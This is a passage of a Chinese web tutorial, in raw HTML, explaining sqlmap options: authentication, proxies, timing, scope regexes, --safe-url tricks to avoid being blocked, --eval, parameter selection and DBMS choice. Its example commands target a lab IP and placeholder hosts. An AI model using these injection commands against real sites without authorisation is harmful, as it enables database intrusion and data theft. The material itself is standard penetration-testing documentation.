New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u53ef\u4ee5\u5728\u8bf7\u6c42\u4e2d\u4f2a\u9020<\/span><span>HTTP<\/span><span>\u4e2d\u7684<\/span><span>referer<\/span><span>\uff0c\u5f53<\/span><span>&#8211;level<\/span><span>\u53c2\u6570\u8bbe\u5b9a\u4e3a<\/span><span>3<\/span><span>\u6216\u8005<\/span><span>3<\/span><span>\u4ee5\u4e0a\u7684\u65f6\u5019\u4f1a\u5c1d\u8bd5\u5bf9<\/span><span>referer<\/span><span>\u6ce8\u5165\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E9%A2%9D%E5%A4%96%E7%9A%84HTTP%E5%A4%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u989d\u5916\u7684HTTP\u5934<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;headers<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u901a\u8fc7<span>&#8211;headers<\/span><span>\u53c2\u6570\u6765\u589e\u52a0\u989d\u5916\u7684<\/span><span>http<\/span><span>\u5934<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"HTTP%E8%AE%A4%E8%AF%81%E4%BF%9D%E6%8A%A4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">HTTP\u8ba4\u8bc1\u4fdd\u62a4<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u53c2\u6570\uff1a<span>&#8211;auth-type,&#8211;auth-cred<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd9\u4e9b\u53c2\u6570\u53ef\u4ee5\u7528\u6765\u767b\u9646<span>HTTP<\/span><span>\u7684\u8ba4\u8bc1\u4fdd\u62a4\u652f\u6301\u4e09\u79cd\u65b9\u5f0f\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">1<span>\u3001<\/span><span>Basic<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">2<span>\u3001<\/span><span>Digest<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">3<span>\u3001<\/span><span>NTLM<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/mysql\/basic\/get_int.php?id=1&#8221;&nbsp;&#8211;auth-type&nbsp;Basic&nbsp;&#8211;auth-cred&nbsp;&#8220;testuser:testpass&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"HTTP%E5%8D%8F%E8%AE%AE%E7%9A%84%E8%AF%81%E4%B9%A6%E8%AE%A4%E8%AF%81\"><\/span>\n\t<span 
style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">HTTP\u534f\u8bae\u7684\u8bc1\u4e66\u8ba4\u8bc1<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;auth-cert<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53<span>Web<\/span><span>\u670d\u52a1\u5668\u9700\u8981\u5ba2\u6237\u7aef\u8bc1\u4e66\u8fdb\u884c\u8eab\u4efd\u9a8c\u8bc1\u65f6\uff0c\u9700\u8981\u63d0\u4f9b\u4e24\u4e2a\u6587\u4ef6<\/span><span>:key_file<\/span><span>\uff0c<\/span><span>cert_file<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">key_file<span>\u662f\u683c\u5f0f\u4e3a<\/span><span>PEM<\/span><span>\u6587\u4ef6\uff0c\u5305\u542b\u7740\u4f60\u7684\u79c1\u94a5\uff0c<\/span><span>cert_file<\/span><span>\u662f\u683c\u5f0f\u4e3a<\/span><span>PEM<\/span><span>\u7684\u8fde\u63a5\u6587\u4ef6\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"HTTPS%E4%BB%A3%E7%90%86\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">HTTP(S)\u4ee3\u7406<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;proxy,&#8211;proxy-cred<\/span><span>\u548c<\/span><span>&#8211;ignore-proxy<\/span><\/span><span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f7f\u7528<span>&#8211;proxy<\/span><span>\u4ee3\u7406\u65f6\u683c\u5f0f\u4e3a\uff1a<\/span><span>http:\/\/url:port<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53<span>HTTP(S)<\/span><span>\u4ee3\u7406\u9700\u8981\u8ba4\u8bc1\u65f6\u53ef\u4ee5\u4f7f\u7528<\/span><span>&#8211;proxy-cred<\/span><span>\u53c2\u6570\uff1a<\/span><span>username:password<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">&#8211;ignore-proxy<span>\u62d2\u7edd\u4f7f\u7528\u672c\u5730\u5c40\u57df\u7f51\u7684<\/span><span>HTTP(S)<\/span><span>\u4ee3\u7406\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"HTTP%E8%AF%B7%E6%B1%82%E5%BB%B6%E8%BF%9F\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">HTTP\u8bf7\u6c42\u5ef6\u8fdf<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;delay<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u53ef\u4ee5\u8bbe\u5b9a\u4e24\u4e2a<span>HTTP(S)<\/span><span>\u8bf7\u6c42\u95f4\u7684\u5ef6\u8fdf\uff0c\u8bbe\u5b9a\u4e3a<\/span><span>0.5<\/span><span>\u7684\u65f6\u5019\u662f\u534a\u79d2\uff0c\u9ed8\u8ba4\u662f\u6ca1\u6709\u5ef6\u8fdf\u7684\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AE%BE%E5%AE%9A%E8%B6%85%E6%97%B6%E6%97%B6%E9%97%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bbe\u5b9a\u8d85\u65f6\u65f6\u95f4<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;timeout<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u8bbe\u5b9a\u4e00\u4e2a<span>HTTP(S)<\/span><span>\u8bf7\u6c42\u8d85\u8fc7\u591a\u4e45\u5224\u5b9a\u4e3a\u8d85\u65f6\uff0c<\/span><span>10.5<\/span><span>\u8868\u793a<\/span><span>10.5<\/span><span>\u79d2\uff0c\u9ed8\u8ba4\u662f<\/span><span>30<\/span><span>\u79d2\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AE%BE%E5%AE%9A%E9%87%8D%E8%AF%95%E8%B6%85%E6%97%B6\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bbe\u5b9a\u91cd\u8bd5\u8d85\u65f6<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;retries<\/span><\/span><span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53<span>HTTP(S)<\/span><span>\u8d85\u65f6\u65f6\uff0c\u53ef\u4ee5\u8bbe\u5b9a\u91cd\u65b0\u5c1d\u8bd5\u8fde\u63a5\u6b21\u6570\uff0c\u9ed8\u8ba4\u662f<\/span><span>3<\/span><span>\u6b21\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AE%BE%E5%AE%9A%E9%9A%8F%E6%9C%BA%E6%94%B9%E5%8F%98%E7%9A%84%E5%8F%82%E6%95%B0%E5%80%BC\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bbe\u5b9a\u968f\u673a\u6539\u53d8\u7684\u53c2\u6570\u503c<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;randomize<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u8bbe\u5b9a\u67d0\u4e00\u4e2a\u53c2\u6570\u503c\u5728\u6bcf\u4e00\u6b21\u8bf7\u6c42\u4e2d\u968f\u673a\u7684\u53d8\u5316\uff0c\u957f\u5ea6\u548c\u7c7b\u578b\u4f1a\u4e0e\u63d0\u4f9b\u7684\u521d\u59cb\u503c\u4e00\u6837\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%A9%E7%94%A8%E6%AD%A3%E5%88%99%E8%BF%87%E6%BB%A4%E7%9B%AE%E6%A0%87%E7%BD%91%E5%9D%80\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5229\u7528\u6b63\u5219\u8fc7\u6ee4\u76ee\u6807\u7f51\u5740<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p 
class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;scope<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-l&nbsp;burp.log&nbsp;&#8211;scope=&#8221;(www)?\\.target\\.(com|net|org)&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E9%81%BF%E5%85%8D%E8%BF%87%E5%A4%9A%E7%9A%84%E9%94%99%E8%AF%AF%E8%AF%B7%E6%B1%82%E8%A2%AB%E5%B1%8F%E8%94%BD\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u907f\u514d\u8fc7\u591a\u7684\u9519\u8bef\u8bf7\u6c42\u88ab\u5c4f\u853d<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;safe-url,&#8211;safe-freq<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u6709\u7684<span>web<\/span><span>\u5e94\u7528\u7a0b\u5e8f\u4f1a\u5728\u4f60\u591a\u6b21\u8bbf\u95ee\u9519\u8bef\u7684\u8bf7\u6c42\u65f6\u5c4f\u853d\u6389\u4f60\u4ee5\u540e\u7684\u6240\u6709\u8bf7\u6c42\uff0c\u8fd9\u6837\u5728<\/span><span>sqlmap<\/span><span>\u8fdb\u884c\u63a2\u6d4b\u6216\u8005\u6ce8\u5165\u7684\u65f6\u5019\u53ef\u80fd\u9020\u6210\u9519\u8bef\u8bf7\u6c42\u800c\u89e6\u53d1\u8fd9\u4e2a\u7b56\u7565\uff0c\u5bfc\u81f4\u4ee5\u540e\u65e0\u6cd5\u8fdb\u884c\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u7ed5\u8fc7\u8fd9\u4e2a\u7b56\u7565\u6709\u4e24\u79cd\u65b9\u5f0f\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">1<span>\u3001<\/span><span>&#8211;safe-url<\/span><span>\uff1a\u63d0\u4f9b\u4e00\u4e2a\u5b89\u5168\u4e0d\u9519\u8bef\u7684\u8fde\u63a5\uff0c\u6bcf\u9694\u4e00\u6bb5\u65f6\u95f4\u90fd\u4f1a\u53bb\u8bbf\u95ee\u4e00\u4e0b\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">2<span>\u3001<\/span><span>&#8211;safe-freq<\/span><span>\uff1a\u63d0\u4f9b\u4e00\u4e2a\u5b89\u5168\u4e0d\u9519\u8bef\u7684\u8fde\u63a5\uff0c\u6bcf\u6b21\u6d4b\u8bd5\u8bf7\u6c42\u4e4b\u540e\u90fd\u4f1a\u518d\u8bbf\u95ee\u4e00\u904d\u5b89\u5168\u8fde\u63a5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%85%B3%E6%8E%89URL%E5%8F%82%E6%95%B0%E5%80%BC%E7%BC%96%E7%A0%81\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5173\u6389URL\u53c2\u6570\u503c\u7f16\u7801<\/span><span 
style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;skip-urlencode<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6839\u636e\u53c2\u6570\u4f4d\u7f6e\uff0c\u4ed6\u7684\u503c\u9ed8\u8ba4\u5c06\u4f1a\u88ab<span>URL<\/span><span>\u7f16\u7801\uff0c\u4f46\u662f\u6709\u4e9b\u65f6\u5019\u540e\u7aef\u7684<\/span><span>web<\/span><span>\u670d\u52a1\u5668\u4e0d\u9075\u5b88<\/span><span>RFC<\/span><span>\u6807\u51c6\uff0c\u53ea\u63a5\u53d7\u4e0d\u7ecf\u8fc7<\/span><span>URL<\/span><span>\u7f16\u7801\u7684\u503c\uff0c\u8fd9\u65f6\u5019\u5c31\u9700\u8981\u7528<\/span><span>&#8211;skip-urlencode<\/span><span>\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%AF%8F%E6%AC%A1%E8%AF%B7%E6%B1%82%E6%97%B6%E5%80%99%E6%89%A7%E8%A1%8C%E8%87%AA%E5%AE%9A%E4%B9%89%E7%9A%84python%E4%BB%A3%E7%A0%81\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6bcf\u6b21\u8bf7\u6c42\u65f6\u5019\u6267\u884c\u81ea\u5b9a\u4e49\u7684python\u4ee3\u7801<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;eval<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u5728\u6709\u4e9b\u65f6\u5019\uff0c\u9700\u8981\u6839\u636e\u67d0\u4e2a\u53c2\u6570\u7684\u53d8\u5316\uff0c\u800c\u4fee\u6539\u53e6\u4e00\u4e2a\u53c2\u6570\uff0c\u624d\u80fd\u5f62\u6210\u6b63\u5e38\u7684\u8bf7\u6c42\uff0c\u8fd9\u65f6\u53ef\u4ee5\u7528<span>&#8211;eval<\/span><span>\u53c2\u6570\u5728\u6bcf\u6b21\u8bf7\u6c42\u65f6\u6839\u636e\u6240\u5199<\/span><span>python<\/span><span>\u4ee3\u7801\u505a\u5b8c\u4fee\u6539\u540e\u8bf7\u6c42\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/www.target.com\/vuln.php?id=1&amp;hash=c4ca4238a0b923820dcc509a6f75849b&#8221;&nbsp;&#8211;eval=&#8221;import&nbsp;hashlib;hash=hashlib.md5(id).hexdigest()&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e0a\u9762\u7684\u8bf7\u6c42\u5c31\u662f\u6bcf\u6b21\u8bf7\u6c42\u65f6\u6839\u636e<span>id<\/span><span>\u53c2\u6570\u503c\uff0c\u505a\u4e00\u6b21<\/span><span>md5<\/span><span>\u540e\u4f5c\u4e3a<\/span><span>hash<\/span><span>\u53c2\u6570\u7684\u503c\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E6%B3%A8%E5%85%A5\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u6ce8\u5165<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times 
New Roman';\">&nbsp;<\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E6%B5%8B%E8%AF%95%E5%8F%82%E6%95%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u6d4b\u8bd5\u53c2\u6570<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-p,&#8211;skip<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u9ed8\u8ba4\u6d4b\u8bd5\u6240\u6709\u7684<\/span><span>GET<\/span><span>\u548c<\/span><span>POST<\/span><span>\u53c2\u6570\uff0c\u5f53<\/span><span>&#8211;level<\/span><span>\u7684\u503c\u5927\u4e8e\u7b49\u4e8e<\/span><span>2<\/span><span>\u7684\u65f6\u5019\u4e5f\u4f1a\u6d4b\u8bd5<\/span><span>HTTP&nbsp;Cookie<\/span><span>\u5934\u7684\u503c\uff0c\u5f53\u5927\u4e8e\u7b49\u4e8e<\/span><span>3<\/span><span>\u7684\u65f6\u5019\u4e5f\u4f1a\u6d4b\u8bd5<\/span><span>User-Agent<\/span><span>\u548c<\/span><span>HTTP&nbsp;Referer<\/span><span>\u5934\u7684\u503c\u3002\u4f46\u662f\u4f60\u53ef\u4ee5\u624b\u52a8\u7528<\/span><span>-p<\/span><span>\u53c2\u6570\u8bbe\u7f6e\u60f3\u8981\u6d4b\u8bd5\u7684\u53c2\u6570\u3002\u4f8b\u5982\uff1a&nbsp;<\/span><span>-p&nbsp;&#8220;id,user-agent&#8221;<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u4f60\u4f7f\u7528<span>&#8211;level<\/span><span>\u7684\u503c\u5f88\u5927\u4f46\u662f\u6709\u4e2a\u522b\u53c2\u6570\u4e0d\u60f3\u6d4b\u8bd5\u7684\u65f6\u5019\u53ef\u4ee5\u4f7f\u7528<\/span><span>&#8211;skip<\/span><span>\u53c2\u6570\u3002<\/span><\/span><span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<span>&#8211;skip=&#8221;user-agent,referer&#8221;<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5728\u6709\u4e9b\u65f6\u5019<span>web<\/span><span>\u670d\u52a1\u5668\u4f7f\u7528\u4e86<\/span><span>URL<\/span><span>\u91cd\u5199\uff0c\u5bfc\u81f4\u65e0\u6cd5\u76f4\u63a5\u4f7f\u7528<\/span><span>sqlmap<\/span><span>\u6d4b\u8bd5\u53c2\u6570\uff0c\u53ef\u4ee5\u5728\u60f3\u6d4b\u8bd5\u7684\u53c2\u6570\u540e\u9762\u52a0<\/span><span>*<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/targeturl\/param1\/value1*\/param2\/value2\/&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u5c06\u4f1a\u6d4b\u8bd5<\/span><span>value1<\/span><span>\u7684\u4f4d\u7f6e\u662f\u5426\u53ef\u6ce8\u5165\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%8C%87%E5%AE%9A%E6%95%B0%E6%8D%AE%E5%BA%93\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6307\u5b9a\u6570\u636e\u5e93<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span 
class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;dbms<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b<span>sqlmap<\/span><span>\u4f1a\u81ea\u52a8\u7684\u63a2\u6d4b<\/span><span>web<\/span><span>\u5e94\u7528\u540e\u7aef\u7684\u6570\u636e\u5e93\u662f\u4ec0\u4e48\uff0c<\/span><span>sqlmap<\/span><span>\u652f\u6301\u7684\u6570\u636e\u5e93\u6709\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">MySQL<span>\u3001<\/span><span>Oracle<\/span><span>\u3001<\/span><span>PostgreSQL<\/span><span>\u3001<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\u3001<\/span><span>Microsoft&nbsp;Access<\/span><span>\u3001<\/span><span>SQLite<\/span><span>\u3001<\/span><span>Firebird<\/span><span>\u3001<\/span><span>Sybase<\/span><span>\u3001<\/span><span>SAP&nbsp;MaxDB<\/span><span>\u3001<\/span><span>DB2<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" 